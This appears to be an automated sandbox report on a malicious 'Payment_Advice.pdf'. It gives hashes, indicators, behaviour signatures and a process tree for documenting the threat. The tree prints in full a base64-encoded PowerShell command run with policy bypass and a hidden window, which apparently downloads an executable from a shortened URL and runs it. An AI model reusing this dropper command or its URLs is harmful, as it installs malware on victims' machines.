Analysis

  • max time kernel
    130s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    08-07-2020 00:38

General

  • Target

    Payment_Advice.pdf

  • Size

    46KB

  • MD5

    e17ca62850d31c5e98ec7707c614835e

  • SHA1

    b40a216b90aa90dd0216be6c7e213543baa867ad

  • SHA256

    3011e796c6bc963f1252a94961fcbea0666245b8fc62dc4f0cbc5c6e8286557a

  • SHA512

    5d0623df19419fed3a0dc3e12eb92c6f0048606b25a8154bafec40dcb8a3399d0fdd19fd0b308065fdd7991f18fe0971ec8b1b911b222c93db1d229abb5ba0a8

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://gg.gg/k50sp

Signatures

  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Checks whether UAC is enabled 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Payment_Advice.pdf"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1072
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://75.127.1.203/invoice_pdf_k50sp.html
      2⤵
      • Checks whether UAC is enabled
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Suspicious use of FindShellTrayWindow
      PID:1312
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1312 CREDAT:275457 /prefetch:2
        3⤵
        • Checks whether UAC is enabled
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:748
        • C:\Windows\SysWOW64\windOWspoWErShElL\v1.0\pOwERShEll.Exe
          "C:\Windows\syStEM32\windOWspoWErShElL\v1.0\pOwERShEll.Exe" pOWERShELl.EXE -eX bypasS -NoP -w 1 -Ec CQAJAAkAUwBlAHQALQBDAG8ATgB0AEUAbgBUAAkACQAJAC0AdgBBACAACQAJACgAIAAJAAkALgAoAEcARQB0AC0AQwBvAG0AbQBBAG4ARAAgAE4AZQBXAC0AbwBCACoAKQAgAAkACQAoAAkACQAJAFsAQwBIAEEAUgBdAAkAIAAJADEAMQAwAAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAGgAQQByAF0ACQAgAAkAMQAwADEACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABBAHIAXQAJACAACQA4ADQACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAHIAXQAJACAACQA0ADYACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABBAFIAXQAJACAACQA4ADcACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABBAHIAXQAJACAACQA2ADkACQAgAAkACQAgAAkAKwAJACAACQBbAGMAaABhAHIAXQAJACAACQA5ADgACQAgAAkACQAgAAkAKwAJACAACQBbAEMAaABhAHIAXQAJACAACQA5ADkACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABhAFIAXQAJACAACQAxADAAOAAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAGEAcgBdAAkAIAAJADcAMwAJACAACQAJACAACQArAAkAIAAJAFsAYwBoAEEAUgBdAAkAIAAJADYAOQAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAGEAUgBdAAkAIAAJADcAOAAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAGEAcgBdAAkAIAAJADEAMQA2AAkAIAAJAAkACQAJACkAKQAuACgACQAJACAAWwBDAGgAYQBSAF0AIAAJACAAMQAwADAAIAAJACAAIAAJACAAKwAgAAkAIABbAEMASABhAFIAXQAgAAkAIAA3ADkAIAAJACAAIAAJACAAKwAgAAkAIABbAEMASABBAHIAXQAgAAkAIAAxADEAOQAgAAkAIAAgAAkAIAArACAACQAgAFsAYwBIAEEAcgBdACAACQAgADEAMQAwACAACQAgACAACQAgACsAIAAJACAAWwBjAEgAYQByAF0AIAAJACAANwA2ACAACQAgACAACQAgACsAIAAJACAAWwBDAEgAYQBSAF0AIAAJACAANwA5ACAACQAgACAACQAgACsAIAAJACAAWwBDAGgAQQByAF0AIAAJACAAOQA3ACAACQAgACAACQAgACsAIAAJACAAWwBjAGgAYQByAF0AIAAJACAAMQAwADAAIAAJACAAIAAJACAAKwAgAAkAIABbAEMAaABhAHIAXQAgAAkAIAA2ADgAIAAJACAAIAAJACAAKwAgAAkAIABbAEMASABBAFIAXQAgAAkAIAA5ADcAIAAJACAAIAAJACAAKwAgAAkAIABbAEMAaABhAFIAXQAgAAkAIAA4ADQAIAAJACAAIAAJACAAKwAgAAkAIABbAGMAaABBAFIAXQAgAAkAIAA2ADUAIAAJACAACQAgAAkAKQAuAEkAbgBWAG8ASwBlACgACQAJAAkAKABbAGMAaABhAHIAXQAJACAACQAxADAANAAJACAACQAJACAACQArAAkAIAAJAFsAQwBoAEEAUgBdAAkAIAAJADEAMQA2AAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAEgAYQBSAF0ACQAgAAkAMQAxADYACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAFIAXQAJACAACQAxADEAMgAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAGEAcgBdAAkAIAAJADUAOAAJACAACQAJACAACQArAAkAIAAJAFsAQwBoAEEAUgBdAAkAIAAJADQANwAJACAACQAJACAACQArAAkAIAAJAFsAYwBoAEEAcgBdAAkAIAAJADQANwAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAGEAcgBdAAkAIAAJADEAMAAzAAkAIAAJAAkAIAAJACsACQAgAAkAWwBDAGgAYQByAF0ACQAgAAkAMQAwADMACQAgAAkACQAgAAkAKwAJACAACQBbAEMAaABBAFIAXQAJACAACQA0ADYACQAgAAkACQAgAAkAKwAJACAACQBbAGMAaABhAHIAXQAJACAACQAxADAAMwAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAEEAUgBdAAkAIAAJADEAMAAzAAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAGgAQQBSAF0ACQAgAAkANAA3AAkAIAAJAAkAIAAJACsACQAgAAkAWwBDAGgAYQBSAF0ACQAgAAkAMQAwADcACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAHIAXQAJACAACQA1ADMACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAFIAXQAJACAACQA0ADgACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABBAHIAXQAJACAACQAxADEANQAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAEEAUgBdAAkAIAAJADEAMQAyAAkAIAAJACkAIAAgAAkAKQAJACAAIAAtAGUAbgAgACAAIAAoAAkAIAAgAFsAQwBoAGEAcgBdACAAIAAJADYANgAgACAACQAgACAACQArACAAIAAJAFsAYwBIAEEAcgBdACAAIAAJADEAMgAxACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAYQBSAF0AIAAgAAkAMQAxADYAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABBAHIAXQAgACAACQA2ADkAIAAgAAkAIAAgAAkAKQAgAAkACQAtAHAAYQBUAEgAIAAgACAAHSAkAEUATgBWADoAQQBwAHAAZABBAHQAQQBcAGgAawBjAG0AZAAuAGUAeABlAB0gCQAJACAAOwAgACAACQBTAFQAQQByAHQACQAgACAAHSAkAEUAbgB2ADoAYQBwAHAAZABhAFQAYQBcAGgAawBjAG0AZAAuAGUAeABlAB0g
          4⤵
          • Suspicious use of WriteProcessMemory
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          PID:1784
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypasS -NoP -w 1 -Ec CQAJAAkAUwBlAHQALQBDAG8ATgB0AEUAbgBUAAkACQAJAC0AdgBBACAACQAJACgAIAAJAAkALgAoAEcARQB0AC0AQwBvAG0AbQBBAG4ARAAgAE4AZQBXAC0AbwBCACoAKQAgAAkACQAoAAkACQAJAFsAQwBIAEEAUgBdAAkAIAAJADEAMQAwAAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAGgAQQByAF0ACQAgAAkAMQAwADEACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABBAHIAXQAJACAACQA4ADQACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAHIAXQAJACAACQA0ADYACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABBAFIAXQAJACAACQA4ADcACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABBAHIAXQAJACAACQA2ADkACQAgAAkACQAgAAkAKwAJACAACQBbAGMAaABhAHIAXQAJACAACQA5ADgACQAgAAkACQAgAAkAKwAJACAACQBbAEMAaABhAHIAXQAJACAACQA5ADkACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABhAFIAXQAJACAACQAxADAAOAAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAGEAcgBdAAkAIAAJADcAMwAJACAACQAJACAACQArAAkAIAAJAFsAYwBoAEEAUgBdAAkAIAAJADYAOQAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAGEAUgBdAAkAIAAJADcAOAAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAGEAcgBdAAkAIAAJADEAMQA2AAkAIAAJAAkACQAJACkAKQAuACgACQAJACAAWwBDAGgAYQBSAF0AIAAJACAAMQAwADAAIAAJACAAIAAJACAAKwAgAAkAIABbAEMASABhAFIAXQAgAAkAIAA3ADkAIAAJACAAIAAJACAAKwAgAAkAIABbAEMASABBAHIAXQAgAAkAIAAxADEAOQAgAAkAIAAgAAkAIAArACAACQAgAFsAYwBIAEEAcgBdACAACQAgADEAMQAwACAACQAgACAACQAgACsAIAAJACAAWwBjAEgAYQByAF0AIAAJACAANwA2ACAACQAgACAACQAgACsAIAAJACAAWwBDAEgAYQBSAF0AIAAJACAANwA5ACAACQAgACAACQAgACsAIAAJACAAWwBDAGgAQQByAF0AIAAJACAAOQA3ACAACQAgACAACQAgACsAIAAJACAAWwBjAGgAYQByAF0AIAAJACAAMQAwADAAIAAJACAAIAAJACAAKwAgAAkAIABbAEMAaABhAHIAXQAgAAkAIAA2ADgAIAAJACAAIAAJACAAKwAgAAkAIABbAEMASABBAFIAXQAgAAkAIAA5ADcAIAAJACAAIAAJACAAKwAgAAkAIABbAEMAaABhAFIAXQAgAAkAIAA4ADQAIAAJACAAIAAJACAAKwAgAAkAIABbAGMAaABBAFIAXQAgAAkAIAA2ADUAIAAJACAACQAgAAkAKQAuAEkAbgBWAG8ASwBlACgACQAJAAkAKABbAGMAaABhAHIAXQAJACAACQAxADAANAAJACAACQAJACAACQArAAkAIAAJAFsAQwBoAEEAUgBdAAkAIAAJADEAMQA2AAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAEgAYQBSAF0ACQAgAAkAMQAxADYACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAFIAXQAJACAACQAxADEAMgAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAGEAcgBdAAkAIAAJADUAOAAJACAACQAJACAACQArAAkAIAAJAFsAQwBoAEEAUgBdAAkAIAAJADQANwAJACAACQAJACAACQArAAkAIAAJAFsAYwBoAEEAcgBdAAkAIAAJADQANwAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAGEAcgBdAAkAIAAJADEAMAAzAAkAIAAJAAkAIAAJACsACQAgAAkAWwBDAGgAYQByAF0ACQAgAAkAMQAwADMACQAgAAkACQAgAAkAKwAJACAACQBbAEMAaABBAFIAXQAJACAACQA0ADYACQAgAAkACQAgAAkAKwAJACAACQBbAGMAaABhAHIAXQAJACAACQAxADAAMwAJACAACQAJACAACQArAAkAIAAJAFsAYwBIAEEAUgBdAAkAIAAJADEAMAAzAAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAGgAQQBSAF0ACQAgAAkANAA3AAkAIAAJAAkAIAAJACsACQAgAAkAWwBDAGgAYQBSAF0ACQAgAAkAMQAwADcACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAHIAXQAJACAACQA1ADMACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAFIAXQAJACAACQA0ADgACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABBAHIAXQAJACAACQAxADEANQAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAEEAUgBdAAkAIAAJADEAMQAyAAkAIAAJACkAIAAgAAkAKQAJACAAIAAtAGUAbgAgACAAIAAoAAkAIAAgAFsAQwBoAGEAcgBdACAAIAAJADYANgAgACAACQAgACAACQArACAAIAAJAFsAYwBIAEEAcgBdACAAIAAJADEAMgAxACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAYQBSAF0AIAAgAAkAMQAxADYAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABBAHIAXQAgACAACQA2ADkAIAAgAAkAIAAgAAkAKQAgAAkACQAtAHAAYQBUAEgAIAAgACAAHSAkAEUATgBWADoAQQBwAHAAZABBAHQAQQBcAGgAawBjAG0AZAAuAGUAeABlAB0gCQAJACAAOwAgACAACQBTAFQAQQByAHQACQAgACAAHSAkAEUAbgB2ADoAYQBwAHAAZABhAFQAYQBcAGgAawBjAG0AZAAuAGUAeABlAB0g
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:1588

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\j8hu3ld\imagestore.dat
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\VUDHLCH9.txt
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  • memory/748-1-0x0000000000000000-mapping.dmp
  • memory/1312-0-0x0000000000000000-mapping.dmp
  • memory/1588-9-0x0000000000000000-mapping.dmp
  • memory/1784-5-0x0000000000000000-mapping.dmp